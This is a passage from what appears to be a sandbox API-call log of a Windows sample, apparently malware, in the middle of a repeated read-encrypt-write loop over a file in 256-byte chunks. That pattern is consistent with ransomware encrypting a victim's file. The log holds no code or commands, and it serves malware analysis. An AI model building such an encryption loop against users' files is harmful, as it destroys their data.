lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.036] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.036] GetLastError () returned 0x0 [0172.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.036] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.036] GetLastError () returned 0x0 [0172.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.036] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.036] GetLastError () returned 0x0 [0172.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.036] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.036] GetLastError () returned 0x0 [0172.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.037] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.037] GetLastError () returned 0x0 [0172.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.038] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.038] GetLastError () returned 0x0 [0172.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.038] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.038] GetLastError () returned 0x0 [0172.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.038] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.038] GetLastError () returned 0x0 [0172.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.038] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.038] GetLastError () returned 0x0 [0172.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.038] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.038] GetLastError () returned 0x0 [0172.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.038] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.038] GetLastError () returned 0x0 [0172.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.039] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.039] GetLastError () returned 0x0 [0172.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.039] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.039] GetLastError () returned 0x0 [0172.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.039] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.039] GetLastError () returned 0x0 [0172.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.039] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.039] GetLastError () returned 0x0 [0172.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.039] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.039] GetLastError () returned 0x0 [0172.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.039] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.039] GetLastError () returned 0x0 [0172.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.039] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.040] GetLastError () returned 0x0 [0172.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.040] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.040] GetLastError () returned 0x0 [0172.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.040] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.040] GetLastError () returned 0x0 [0172.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.040] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.040] GetLastError () returned 0x0 [0172.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.040] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.040] GetLastError () returned 0x0 [0172.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.040] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.040] GetLastError () returned 0x0 [0172.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.040] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.040] GetLastError () returned 0x0 [0172.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.041] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.041] GetLastError () returned 0x0 [0172.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.041] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.041] GetLastError () returned 0x0 [0172.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.041] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.041] GetLastError () returned 0x0 [0172.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.041] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.041] GetLastError () returned 0x0 [0172.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.041] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.041] GetLastError () returned 0x0 [0172.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.041] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.041] GetLastError () returned 0x0 [0172.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.042] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.042] GetLastError () returned 0x0 [0172.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.042] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 